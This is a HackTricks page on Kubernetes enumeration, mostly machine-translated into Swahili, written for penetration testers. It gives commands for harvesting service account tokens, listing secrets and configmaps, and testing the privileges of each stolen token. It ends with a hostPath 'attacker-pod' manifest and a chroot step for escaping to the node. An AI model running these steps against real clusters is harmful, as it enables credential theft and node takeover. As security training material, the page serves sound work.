Kubernetes Enumeration

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Kubernetes Tokens

Ikiwa umepata ufikiaji wa mashine, mtumiaji anaweza kuwa na ufikiaji wa jukwaa la Kubernetes. Token kawaida hupatikana katika faili inayotajwa na env var KUBECONFIG au ndani ya ~/.kube.

Katika folda hii unaweza kupata faili za usanidi zenye tokens na usanidi wa kuungana na seva ya API. Katika folda hii pia unaweza kupata folda ya cache yenye taarifa zilizopatikana awali.

Ikiwa umepata pod ndani ya mazingira ya kubernetes, kuna maeneo mengine ambapo unaweza kupata tokens na taarifa kuhusu mazingira ya K8 ya sasa:

Service Account Tokens

Kabla ya kuendelea, ikiwa hujui ni nini huduma katika Kubernetes ningependekeza ufuate kiungo hiki na usome angalau taarifa kuhusu usanifu wa Kubernetes.

Imechukuliwa kutoka kwa nyaraka za Kubernetes:

“Unapounda pod, ikiwa hujaeleza akaunti ya huduma, inatolewa kiotomatiki akaunti ya huduma default katika namespace hiyo hiyo.”

ServiceAccount ni kitu kinachosimamiwa na Kubernetes na kinatumika kutoa kitambulisho kwa michakato inayofanyika katika pod. Kila akaunti ya huduma ina siri inayohusiana nayo na siri hii ina bearer token. Hii ni JSON Web Token (JWT), njia ya kuwakilisha madai kwa usalama kati ya pande mbili.

Kawaida moja ya directories:

/run/secrets/kubernetes.io/serviceaccount
/var/run/secrets/kubernetes.io/serviceaccount
/secrets/kubernetes.io/serviceaccount

zina faili:

ca.crt: Ni cheti cha ca kuangalia mawasiliano ya kubernetes
namespace: Inaonyesha namespace ya sasa
token: Inabeba service token ya pod ya sasa.

Sasa kwamba una token, unaweza kupata seva ya API ndani ya variable ya mazingira KUBECONFIG. Kwa maelezo zaidi endesha (env | set) | grep -i "kuber|kube"

Token ya akaunti ya huduma inasainiwa na funguo zilizoko katika faili sa.key na kuthibitishwa na sa.pub.

Mahali pa kawaida kwenye Kubernetes:

/etc/kubernetes/pki

Mahali pa kawaida kwenye Minikube:

/var/lib/localkube/certs

Hot Pods

Hot pods ni pods zinazobeba token ya akaunti ya huduma yenye mamlaka. Token ya akaunti ya huduma yenye mamlaka ni token ambayo ina ruhusa ya kufanya kazi zenye mamlaka kama vile kuorodhesha siri, kuunda pods, n.k.

RBAC

Ikiwa hujui ni nini RBAC, soma sehemu hii.

GUI Applications

k9s: GUI inayoorodhesha klasta ya kubernetes kutoka kwenye terminal. Angalia amri katika https://k9scli.io/topics/commands/. Andika :namespace na uchague yote ili kisha kutafuta rasilimali katika namespaces zote.
k8slens: Inatoa siku chache za majaribio bure: https://k8slens.dev/

Enumeration CheatSheet

Ili kuorodhesha mazingira ya K8s unahitaji kadhaa ya haya:

token halali ya uthibitishaji. Katika sehemu iliyopita tuliona wapi pa kutafuta token ya mtumiaji na token ya akaunti ya huduma.
anwani (https://host:port) ya API ya Kubernetes. Hii inaweza kawaida kupatikana katika variable za mazingira na/au katika faili ya kube config.
Hiari: ca.crt ili kuthibitisha seva ya API. Hii inaweza kupatikana katika maeneo sawa ambapo token inaweza kupatikana. Hii ni muhimu kuthibitisha cheti cha seva ya API, lakini ukitumia --insecure-skip-tls-verify na kubectl au -k na curl hutahitaji hii.

Kwa maelezo hayo unaweza kuorodhesha kubernetes. Ikiwa API kwa sababu fulani inapatikana kupitia Mtandao, unaweza tu kupakua taarifa hiyo na kuorodhesha jukwaa kutoka kwa mwenyeji wako.

Hata hivyo, kawaida seva ya API iko ndani ya mtandao wa ndani, kwa hivyo utahitaji kuunda tunnel kupitia mashine iliyovunjika ili kuweza kuifikia kutoka kwa mashine yako, au unaweza kupakia kubectl binary, au tumia curl/wget/chochote kufanya maombi ya HTTP ya moja kwa moja kwa seva ya API.

Differences between `list` and `get` verbs

Kwa get ruhusa unaweza kupata taarifa za mali maalum (describe chaguo katika kubectl) API:

GET /apis/apps/v1/namespaces/{namespace}/deployments/{name}

Ikiwa una ruhusa ya list, unaruhusiwa kutekeleza maombi ya API ili orodhesha aina ya mali (get chaguo katika kubectl):

#In a namespace
GET /apis/apps/v1/namespaces/{namespace}/deployments
#In all namespaces
GET /apis/apps/v1/deployments

Ikiwa una ruhusa ya watch, unaruhusiwa kutekeleza maombi ya API ili kufuatilia mali:

GET /apis/apps/v1/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments/{name}  [DEPRECATED]
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments  [DEPRECATED]
GET /apis/apps/v1/watch/deployments  [DEPRECATED]

Wanafungua muunganisho wa utiririshaji ambao unakurudishia orodha kamili ya Utekelezaji kila wakati inabadilika (au wakati mpya inaundwa).

Amri zifuatazo za kubectl zinaonyesha jinsi ya kuorodhesha vitu. Ikiwa unataka kufikia data unahitaji kutumia describe badala ya get

Kutumia curl

Kutoka ndani ya pod unaweza kutumia mabadiliko kadhaa ya mazingira:

export APISERVER=${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
export CACERT=${SERVICEACCOUNT}/ca.crt
alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
# if kurl is still got cert Error, using -k option to solve this.

Kwa default, pod inaweza kufikia kube-api server katika jina la domain kubernetes.default.svc na unaweza kuona mtandao wa kube katika /etc/resolv.config kwani hapa utapata anwani ya seva ya DNS ya kubernetes (".1" ya safu hiyo ni kiunganishi cha kube-api).

Kutumia kubectl

Kuwa na token na anwani ya seva ya API unatumia kubectl au curl kufikia hiyo kama ilivyoonyeshwa hapa:

Kwa default, APISERVER inawasiliana na muundo wa https://

alias k='kubectl --token=$TOKEN --server=https://$APISERVER --insecure-skip-tls-verify=true [--all-namespaces]' # Use --all-namespaces to always search in all namespaces

ikiwa hakuna https:// katika url, unaweza kupata Kosa Kama Ombi Mbaya.

Unaweza kupata karatasi ya udanganyifu rasmi ya kubectl hapa. Lengo la sehemu zifuatazo ni kuwasilisha kwa mpangilio tofauti chaguzi za kuhesabu na kuelewa K8s mpya ambayo umepata ufikiaji nayo.

Ili kupata ombi la HTTP ambalo kubectl inatuma unaweza kutumia parameter -v=8

MitM kubectl - Kuweka proxy kubectl

# Launch burp
# Set proxy
export HTTP_PROXY=http://localhost:8080
export HTTPS_PROXY=http://localhost:8080
# Launch kubectl
kubectl get namespace --insecure-skip-tls-verify=true

Mipangilio ya Sasa

kubectl config get-users
kubectl config get-contexts
kubectl config get-clusters
kubectl config current-context

# Change namespace
kubectl config set-context --current --namespace=<namespace>

Ikiwa umeweza kuiba akiba za watumiaji, unaweza kuziweka kwenye kompyuta yako ukitumia kitu kama:

kubectl config set-credentials USER_NAME \
--auth-provider=oidc \
--auth-provider-arg=idp-issuer-url=( issuer url ) \
--auth-provider-arg=client-id=( your client id ) \
--auth-provider-arg=client-secret=( your client secret ) \
--auth-provider-arg=refresh-token=( your refresh token ) \
--auth-provider-arg=idp-certificate-authority=( path to your ca certificate ) \
--auth-provider-arg=id-token=( your id_token )

Pata Rasilimali Zinazoungwa Mkono

Kwa habari hii utajua huduma zote unazoweza kuorodhesha

k api-resources --namespaced=true #Resources specific to a namespace
k api-resources --namespaced=false #Resources NOT specific to a namespace

Pata Haki za Sasa

k auth can-i --list #Get privileges in general
k auth can-i --list -n custnamespace #Get privileves in custnamespace

# Get service account permissions
k auth can-i --list --as=system:serviceaccount:<namespace>:<sa_name> -n <namespace>

kurl -i -s -k -X $'POST' \
-H $'Content-Type: application/json' \
--data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \
"https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"

Njia nyingine ya kuangalia haki zako ni kutumia chombo: https://github.com/corneliusweig/rakkess****

Unaweza kujifunza zaidi kuhusu Kubernetes RBAC katika:

Kubernetes Role-Based Access Control(RBAC)

Mara tu unavyojua ni haki zipi ulizonazo, angalia ukurasa ufuatao ili kubaini kama unaweza kuzitumia vibaya ili kupandisha haki:

Abusing Roles/ClusterRoles in Kubernetes

Pata Haki za Wengine

k get roles
k get clusterroles

kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/roles?limit=500"
kurl -k -v "https://$APISERVER/apis/authorization.k8s.io/v1/namespaces/eevee/clusterroles?limit=500"

Pata majina ya maeneo

Kubernetes inasaidia vikundi vingi vya virtual vinavyoungwa mkono na kundi moja la kimwili. Vikundi hivi vya virtual vinaitwa majina ya maeneo.

k get namespaces

kurl -k -v https://$APISERVER/api/v1/namespaces/

Pata siri

k get secrets -o yaml
k get secrets -o yaml -n custnamespace

kurl -v https://$APISERVER/api/v1/namespaces/default/secrets/

kurl -v https://$APISERVER/api/v1/namespaces/custnamespace/secrets/

Ikiwa unaweza kusoma siri unaweza kutumia mistari ifuatayo kupata haki zinazohusiana na kila token:

for token in `k describe secrets -n kube-system | grep "token:" | cut -d " " -f 7`; do echo $token; k --token $token auth can-i --list; echo; done

Pata Akaunti za Huduma

Kama ilivyojadiliwa mwanzoni mwa ukurasa huu wakati pod inatekelezwa, akaunti ya huduma kwa kawaida inatolewa kwake. Hivyo basi, kuorodhesha akaunti za huduma, ruhusa zao na mahali zinapotekelezwa kunaweza kumwezesha mtumiaji kupandisha mamlaka.

k get serviceaccounts

kurl -k -v https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccounts

Pata Maendeleo

Maendeleo yanaelezea vipengele ambavyo vinahitaji kuendeshwa.

k get deployments
k get deployments -n custnamespace

kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/deployments/

Pata Pods

Pods ndizo containers halisi ambazo zitakuwa zinaendesha.

k get pods
k get pods -n custnamespace

kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/

Pata Huduma

Kubernetes huduma zinatumika ku onyesha huduma katika bandari na IP maalum (ambayo itakuwa kama balancer ya mzigo kwa pods ambazo kwa kweli zinatoa huduma). Hii ni ya kuvutia kujua ambapo unaweza kupata huduma nyingine za kujaribu kushambulia.

k get services
k get services -n custnamespace

kurl -v https://$APISERVER/api/v1/namespaces/default/services/

Pata nodi

Pata nodi zote zilizowekwa ndani ya klasta.

k get nodes

kurl -v https://$APISERVER/api/v1/nodes/

Pata DaemonSets

DaeamonSets inaruhusu kuhakikisha kwamba pod maalum inafanya kazi katika nodi zote za klasta (au katika zile zilizochaguliwa). Ikiwa utafuta DaemonSet, pods zinazodhibitiwa nayo pia zitaondolewa.

k get daemonsets

kurl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets

Pata cronjob

Cron jobs inaruhusu kupanga kutumia sintaksia ya crontab uzinduzi wa pod ambayo itatekeleza kitendo chochote.

k get cronjobs

kurl -v https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs

Pata configMap

configMap daima ina habari nyingi na configfile ambazo zinatolewa kwa programu zinazotembea katika kubernetes. Kawaida unaweza kupata nywila nyingi, siri, tokens ambazo zinatumika kuungana na kuthibitisha huduma nyingine za ndani/za nje.

k get configmaps # -n namespace

kurl -v https://$APISERVER/api/v1/namespaces/${NAMESPACE}/configmaps

Pata Sera za Mtandao / Sera za Mtandao za Cilium

k get networkpolicies
k get CiliumNetworkPolicies
k get CiliumClusterwideNetworkPolicies

Pata Kila Kitu / Yote

k get all

Pata rasilimali zote zinazodhibitiwa na helm

k get all --all-namespaces -l='app.kubernetes.io/managed-by=Helm'

Pata matumizi ya Pods

k top pod --all-namespaces

Kutoroka kutoka kwenye pod

Ikiwa unaweza kuunda pods mpya unaweza kuwa na uwezo wa kutoroka kutoka kwao hadi kwenye node. Ili kufanya hivyo unahitaji kuunda pod mpya kwa kutumia faili ya yaml, badilisha kwenda kwenye pod iliyoundwa kisha chroot kwenye mfumo wa node. Unaweza kutumia pods zilizopo kama rejeleo kwa faili ya yaml kwani zinaonyesha picha na njia zilizopo.

kubectl get pod <name> [-n <namespace>] -o yaml

ikiwa unahitaji kuunda pod kwenye nodi maalum, unaweza kutumia amri ifuatayo kupata lebo kwenye nodi
k get nodes --show-labels
Kwa kawaida, kubernetes.io/hostname na node-role.kubernetes.io/master ni lebo nzuri za kuchagua.

Kisha unaunda faili yako ya attack.yaml

apiVersion: v1
kind: Pod
metadata:
labels:
run: attacker-pod
name: attacker-pod
namespace: default
spec:
volumes:
- name: host-fs
hostPath:
path: /
containers:
- image: ubuntu
imagePullPolicy: Always
name: attacker-pod
command: ["/bin/sh", "-c", "sleep infinity"]
volumeMounts:
- name: host-fs
mountPath: /root
restartPolicy: Never
# nodeName and nodeSelector enable one of them when you need to create pod on the specific node
#nodeName: master
#nodeSelector:
#  kubernetes.io/hostname: master
# or using
#  node-role.kubernetes.io/master: ""

original yaml source

Baada ya hapo unaunda pod hiyo

kubectl apply -f attacker.yaml [-n <namespace>]

Sasa unaweza kubadilisha kwenda kwenye pod iliyoundwa kama ifuatavyo

kubectl exec -it attacker-pod [-n <namespace>] -- sh # attacker-pod is the name defined in the yaml file

Na hatimaye unachora ndani ya mfumo wa node.

chroot /root /bin/bash

Information obtained from: Kubernetes Namespace Breakout using Insecure Host Path Volume — Part 1 Attacking and Defending Kubernetes: Bust-A-Kube – Episode 1

References

Kubernetes Pentest Methodology Part 3CyberArk

Jifunze & fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze & fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)